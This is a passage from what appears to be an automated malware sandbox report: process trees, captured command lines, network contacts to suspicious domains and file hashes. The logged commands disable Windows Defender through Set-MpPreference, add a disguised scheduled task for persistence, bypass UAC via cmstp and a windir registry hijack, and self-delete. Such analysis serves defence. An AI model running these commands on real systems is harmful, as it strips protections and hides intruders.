PID 1536 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe
PID 1536 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 1536 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 1536 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 1536 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 200 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 200 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 200 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 3832 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Windows\SysWOW64\cmd.exe
PID 3832 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 3116 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\706782077957666\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 3116

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

"C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe"

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

"C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe"

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

"C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe"

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

"C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe"

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

"C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

"C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe"

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

"C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

"{path}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\knyx0wed.inf

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE85D.tmp"

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

"{path}"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Windows\temp\5j402p4w.exe

C:\Windows\temp\5j402p4w.exe

C:\Windows\temp\5j402p4w.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 5.252.179.21:80 5.252.179.21 tcp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 arsaxa.ac.ug udp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp

Files

memory/996-116-0x0000000000650000-0x000000000079A000-memory.dmp

memory/2712-117-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3832-121-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2712-126-0x0000000000440000-0x00000000004EE000-memory.dmp

memory/3832-128-0x0000000000450000-0x000000000059A000-memory.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/3116-129-0x0000000000417A8B-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1872-131-0x000000000041A684-mapping.dmp

memory/1536-133-0x000000000044003F-mapping.dmp

memory/3832-134-0x00000000005F0000-0x00000000005F8000-memory.dmp

memory/3116-135-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3116-136-0x0000000000460000-0x0000000000461000-memory.dmp

memory/2712-137-0x0000000000440000-0x000000000058A000-memory.dmp

memory/1872-138-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1872-139-0x0000000000430000-0x00000000004DE000-memory.dmp

memory/1536-141-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/1536-140-0x0000000000400000-0x0000000000495000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\nss3.dll

MD5 02cc7b8ee30056d5912de54f1bdfc219
SHA1 a6923da95705fb81e368ae48f93d28522ef552fb
SHA256 1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5
SHA512 0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\mozglue.dll

MD5 eae9273f8cdcf9321c6c37c244773139
SHA1 8378e2a2f3635574c106eea8419b5eb00b8489b0
SHA256 a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc
SHA512 06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\softokn3.dll

MD5 4e8df049f3459fa94ab6ad387f3561ac
SHA1 06ed392bc29ad9d5fc05ee254c2625fd65925114
SHA256 25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871
SHA512 3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

\Users\Admin\AppData\LocalLow\wG3cB0qZ3rM5x\freebl3.dll

MD5 60acd24430204ad2dc7f148b8cfe9bdc
SHA1 989f377b9117d7cb21cbe92a4117f88f9c7693d9
SHA256 9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97
SHA512 626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

memory/2560-151-0x0000000000000000-mapping.dmp

memory/572-152-0x0000000000000000-mapping.dmp

memory/3616-153-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/3832-156-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/3396-159-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/3832-163-0x00000000020D0000-0x00000000020EB000-memory.dmp

memory/2140-166-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/3396-170-0x0000000000B10000-0x0000000000B11000-memory.dmp

memory/3616-169-0x00000000006C0000-0x00000000006C1000-memory.dmp

memory/2140-172-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

memory/492-171-0x0000000000000000-mapping.dmp

memory/200-173-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/492-180-0x00000000023D0000-0x00000000023EB000-memory.dmp

memory/3028-183-0x0000000000000000-mapping.dmp

memory/3832-184-0x00000000020B0000-0x00000000020B1000-memory.dmp

memory/492-185-0x00000000005E0000-0x000000000072A000-memory.dmp

memory/3396-187-0x0000000007800000-0x0000000007860000-memory.dmp

memory/3616-186-0x0000000004ED0000-0x0000000004F36000-memory.dmp

memory/3616-189-0x0000000007970000-0x0000000007971000-memory.dmp

memory/2140-188-0x00000000054F0000-0x0000000005550000-memory.dmp

memory/3616-192-0x0000000007510000-0x0000000007511000-memory.dmp

memory/3616-195-0x00000000074C0000-0x00000000074C1000-memory.dmp

memory/2140-199-0x0000000005760000-0x0000000005761000-memory.dmp

memory/3396-200-0x0000000005350000-0x0000000005351000-memory.dmp

memory/3616-198-0x0000000004F70000-0x0000000004F71000-memory.dmp

memory/3396-201-0x0000000004DE0000-0x0000000004DE2000-memory.dmp

memory/2140-204-0x0000000005810000-0x0000000005811000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 7c5c07773030f216ff0409611d2f06d1
SHA1 519eaa1e4e4e7f6b07290c5978168e480e401a28
SHA256 daf376acb49aa0f9236dfbc4e7eb75bdc5ae11304797404ba3a080a4c903f296
SHA512 6ae93065172bd4261e526d1f55ffc900c8c93ec567ff0386237379bd4861f330e3848434b3175f1ed8920300947291f7e01e06156068820a46272e22eaaa55d0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 603a92eeda7193c81d81663bdf5e73d7
SHA1 83f882f256ed8be97371ea6d085b1aa1ca0a257b
SHA256 adb6aed4f2100878e771385aea50483231bebba2ecdd864279b920c3565ff7e2
SHA512 cc8078d791ac2ec99ba5dc64914f4d25549ed325c3720717b45b9d3863f64a051c28d6dc641b637b3eae22faf24ac485cd3a135ae6fad932060cf118860ac506

memory/492-210-0x0000000003A30000-0x0000000003A51000-memory.dmp

memory/1648-213-0x0000000000400000-0x0000000000405000-memory.dmp

memory/1648-214-0x0000000000400000-0x0000000000405000-memory.dmp

memory/424-215-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1648-216-0x0000000000400000-0x0000000000405000-memory.dmp

memory/424-217-0x00000000007E2730-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/3624-220-0x0000000000000000-mapping.dmp

memory/1648-222-0x00000000004019E4-mapping.dmp

memory/424-221-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1648-224-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
